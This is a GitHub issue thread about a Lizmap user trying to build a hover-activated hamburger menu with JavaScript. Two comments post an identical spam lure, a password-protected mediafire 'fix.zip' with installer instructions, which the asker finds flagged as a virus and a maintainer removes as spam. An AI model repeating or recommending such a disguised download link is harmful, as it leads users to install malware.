### ISSUE TITLE
[Question]: Hamburger menu on lizmap , displaying items when hovering

### ISSUE THREAD

**Issue by soukac98** [3liz/lizmap-web-client#4708]
### What is the question? (in English)

I tried a javascript code to changer the interface of my lizmap project, by adding a hamburger menu icon that displays all items when hovering, but it seems that i am missing something.
Can someone please help me figure it out? it's been a while since i am trying to modify the interface for my client.
[hamburger-menu.json](https://github.com/user-attachments/files/16746272/hamburger-menu.json)

### Versions, safeguards, check summary etc

https://github.com/3liz/lizmap-web-client/releases/tag/3.7.6

### Check Lizmap plugin

- [X] I have done the step just before in the Lizmap QGIS desktop plugin before opening this ticket. Otherwise, my ticket is not considered valid and might get closed.

### Operating system

windows 10 professionnel

### Browsers

Chrome, Microsoft Edge

### Browsers version

Chrome

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by soukac98** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

Hello, I downloaded the file with the password, but i the exe file is unrecognizable (contains a virus as mentioned in an error message)

can I know what is it?

thank you for your reply!

**Comment by nworr** [comment]
@soukac98 it's  spam comment, i deleted it an edit your message to hide the link

**Comment by soukac98** [comment]
> @soukac98 it's spam comment, i deleted it an edit your message to hide the link

thank you, i deleted my message

**Comment by soukac98** [comment]
Bumping my resquest so that it doesn't go quite

**Comment by Gustry** [comment]
Hi @soukac98,
Your request is not "quite" ... it's only 3 days. In August, it's summer holiday in Europe, a lot of people are on vacation.
The bot will only notice a question is quite after [180 days](https://github.com/3liz/lizmap-web-client/blob/master/.github/workflows/stale_issue.yml#L13C28-L13C31).

Back to your request, the issue is missing some important details.

> but it seems that i am missing something.

You should describe your error, what is the Javascript error ? What does it look like now versus what do you expect ? Maybe add screenshots etc. You should do the troubleshoot yourself and help other to understand your request first. Otherwise, consider asking for commercial support or ask on different channels, maybe it's a generic Javascript question ? So someone on stackexchange will be able to help. 

Side note, I suggest you to read "[How to effectively get things changed in QGIS](https://nyalldawson.net/2016/08/how-to-effectively-get-things-changed-in-qgis/)".

**Comment by soukac98** [comment]
> This issue is missing some feedbacks. 👻 Please have a look to the discussion, thanks. 🦎

Hello, to give some feedbacks and updates about the issue, I'll give specific details : 
 - First of all, I wanted to have a menu icon that regroups all the items, it opens up when hovering and displays these items
 -  After reading some documentation and asking around, there is a js with a css file that helps with this by creating a new interface : i used this : 
```
     var buttonMenu = `<div id="buttonMenu" onmouseover="openMenu()">
								<span style="top:5px;"></span>
								<span style="top: 10px;"></span>
								<span style="top: 15px;"></span>				
							</div>
							<div>POC DEMO</div>` 
```
plus a var CloseMenu function too

- The interface did change, and the items are displayed in the way i want, except for the hovering over the menu button
- In conclusion, I'll close the issue for now as it is an accessory function, but I'll come back if I make it work so that others can use it too!

Thank you!
